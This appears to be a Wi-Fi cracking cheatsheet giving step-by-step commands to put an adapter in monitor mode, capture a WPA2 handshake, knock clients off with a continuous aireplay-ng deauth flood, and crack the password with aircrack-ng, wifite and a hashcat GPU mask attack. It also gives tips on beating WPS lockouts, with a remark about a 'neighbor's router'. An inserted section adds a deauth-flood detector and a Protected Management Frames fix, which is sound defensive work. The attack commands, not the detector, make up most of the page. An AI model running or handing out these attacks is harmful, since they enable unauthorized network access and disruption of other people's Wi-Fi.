# Wifi Cracking

**WLAN Adapter:**

* ALFA Networks AWUS036ACH Dual Adaptor

{% embed url="https://www.amazon.com.au/gp/product/B00VEEBOPG?psc=1" %}

**INSTALL DRIVER & ACTIVATE MONITOR MODE:**

{% embed url="https://www.youtube.com/watch?v=hEXwOkyYNL0" %}

{% embed url="https://www.youtube.com/watch?v=JiuW0Tc26ko" %}

CHECK FOR DEVICE:

```
$ iwconfig
$ lsusb
```

UPDATE:

```
$ sudo apt update
$ sudo apt upgrade -y
$ sudo apt dist-upgrade -y
$ sudo reboot now
$ sudo apt update
```

INSTALL DRIVERS:

```
$ sudo apt install realtek-rtl88xxau-dkms
$ sudo apt install dkms
$ git clone https://github.com/aircrack-ng/rtl8812au
$ cd rtl8812au
$ sudo make
$ sudo make install
```

UNPLUG DEVICE, RECONNECT TO VM:

```
$ lsusb
$ iwconfig
```

TEST:

```
$ sudo airmon-ng start wlan0
$ sudo wifite --wpa --kill
```

## Cracking WiFi WPA2 Handshake

{% embed url="https://www.youtube.com/watch?v=WfYxrLaqlN8&t=599s" %}

See interfaces:

```
ip addr
iwconfig
```

Kill processes:

```
sudo airmon-ng check kill
```

Start monitor mode:

```
sudo airmon-ng start wlan0
```

Verify that monitor mode is used:

```
sudo airmon-ng
```

You could also use iwconfig to check that the interface is in monitor mode:

```
iwconfig
```

Get the AP's MAC address and channel:

```
sudo airodump-ng wlan0
```

AP-MAC & channel:

```
- BSSID/MAC: 
- CHANNEL: 
```

SHOW ONLY SINGLE MAC:

```
$ sudo airodump-ng wlan0 -d A2:B5:3C:C1:F5:FC
```

1st window:\
Make sure you replace the channel number and BSSID with your own.\
Replace hack1 with your own file name, like capture1 or similar.

```
sudo airodump-ng -w hack1 -c 10 --bssid A2:B5:3C:C1:F5:FC wlan0mon
```

2nd window - deauth attack:\
Make sure you replace the BSSID with your own.

```
sudo aireplay-ng --deauth 0 -a A2:B5:3C:C1:F5:FC wlan0
```
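The deauth step above works because, without 802.11w (Protected Management Frames), deauthentication and disassociation frames carry no integrity check, so a client accepts any frame that claims to come from its BSSID. From the defender's side the same property makes a flood easy to spot: a burst of deauth frames, usually broadcast, attributed to one BSSID. The following detector is an added example written for this page, not code from the cheatsheet or from the aircrack-ng project. It builds a few raw 802.11 management frames in memory (constructed MACs, reason codes and timestamps) and runs a sliding-window rate check per BSSID; the window and threshold values are assumptions to tune for a real deployment.

```python
"""Deauth-flood detector over raw 802.11 management frames (constructed example)."""
import struct
from collections import defaultdict, deque

# Frame Control octet 0: protocol version (bits 0-1), type (bits 2-3), subtype (bits 4-7)
TYPE_MGMT = 0
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Minimal 802.11 management frame without FCS: 24-byte header plus body."""
    fc0 = (TYPE_MGMT << 2) | (subtype << 4)
    hdr = struct.pack("<BBH", fc0, 0, 0)            # FC octet 0, flags, duration
    hdr += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    hdr += struct.pack("<H", 0)                      # sequence control
    return hdr + body


def parse_mgmt_frame(raw):
    """Decode the fixed header; returns None for anything shorter than 24 bytes."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    return {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": mac_str(raw[4:10]),      # receiver
        "addr2": mac_str(raw[10:16]),     # transmitter
        "addr3": mac_str(raw[16:22]),     # BSSID for management frames
        "body": raw[24:],
    }


def detect_deauth_flood(frames, window=10.0, threshold=20):
    """frames: iterable of (timestamp_seconds, raw_frame).

    Raises an alert for a BSSID once more than `threshold` deauth/disassoc frames
    attributed to it fall inside any `window`-second span. The alert records the
    peak in-window count, whether any frame was broadcast, and the reason codes seen.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in frames:
        f = parse_mgmt_frame(raw)
        if f is None or f["type"] != TYPE_MGMT:
            continue
        if f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        bssid = f["addr3"]
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:      # drop timestamps that left the window
            q.popleft()
        if len(q) > threshold:
            alert = alerts.setdefault(bssid, {"peak": 0, "broadcast": False, "reasons": set()})
            alert["peak"] = max(alert["peak"], len(q))
            alert["broadcast"] |= f["addr1"] == BROADCAST
            if len(f["body"]) >= 2:          # deauth/disassoc body starts with a reason code
                alert["reasons"].add(struct.unpack("<H", f["body"][:2])[0])
    return alerts


def sample_capture():
    """Constructed capture: one legitimate deauth (reason 3, station leaving) from a
    benign AP, then 50 broadcast deauths in half a second attributed to a second AP."""
    benign_ap, client, target_ap = "02:00:00:00:aa:01", "02:00:00:00:cc:01", "02:00:00:00:bb:02"
    frames = [
        (0.0, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, benign_ap, benign_ap)),
        (1.0, build_mgmt_frame(SUBTYPE_DEAUTH, client, benign_ap, benign_ap, struct.pack("<H", 3))),
    ]
    for i in range(50):
        frames.append((5.0 + i * 0.01,
                       build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, target_ap, target_ap,
                                        struct.pack("<H", 7))))
    return frames


if __name__ == "__main__":
    for bssid, alert in detect_deauth_flood(sample_capture()).items():
        print(f"ALERT {bssid}: peak={alert['peak']} broadcast={alert['broadcast']} reasons={sorted(alert['reasons'])}")
```

The benign AP never trips the threshold, while the flooded BSSID is reported with its peak count and the reason codes used. The durable fix is on the AP side rather than in detection: requiring Protected Management Frames (`ieee80211w=2` in hostapd) makes deauth and disassociation frames carry a MIC, so clients discard forged ones and the attack above only produces noise in the capture.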

Use Wireshark to open the hack file:

```
$ wireshark hack1-01.cap
```

Filter Wireshark messages for EAPOL:

```
eapol
```

Stop monitor mode:

```
sudo airmon-ng stop wlan0
```

Crack the file with rockyou or another wordlist.\
Make sure you have rockyou in text format (unzip the file on Kali).\
Replace hack1-01.cap with your file name.

```
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
```

## Brute force WiFi WPA2 with GPU

Primarily you'll only have luck cracking WPS if the router is quite old and hasn't had any firmware updates (which most people don't update their router firmware, so that's a good chance). Most, if not all, newer routers have brute force protections against WPS, typically in the form of timeouts and locks (as you are seeing on your neighbor's router). When attacking WPS nowadays you need to use time modifiers (I don't know if wifite has that option, but bully and reaver do). Typically, in my experience from a couple years ago, you had to put at minimum 30 seconds between each attempt, but I'm not sure what the standard would be nowadays for that.

{% embed url="https://www.youtube.com/watch?v=J8A8rKFZW-M" %}

**WIFITE:**

```
sudo wifite --wpa --kill
Ctrl+C
(choose NUM)
c (WPA handshake)
ls
cd hs
ls
sudo /usr/share/hashcat-utils/cap2hccapx.bin handshake_KitkatHouse_F8-CA-59-A0-79-3F_2022-12-29T22-22-06.cap wpa2.hccapx
ls
```

**HASHCAT:** \
Install CUDA Toolkit: <https://developer.nvidia.com/cuda-downloads>

```
cd downloads
cd hashcat-6.2.6
hashcat.exe -I
hashcat.exe -m 22000 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d
```
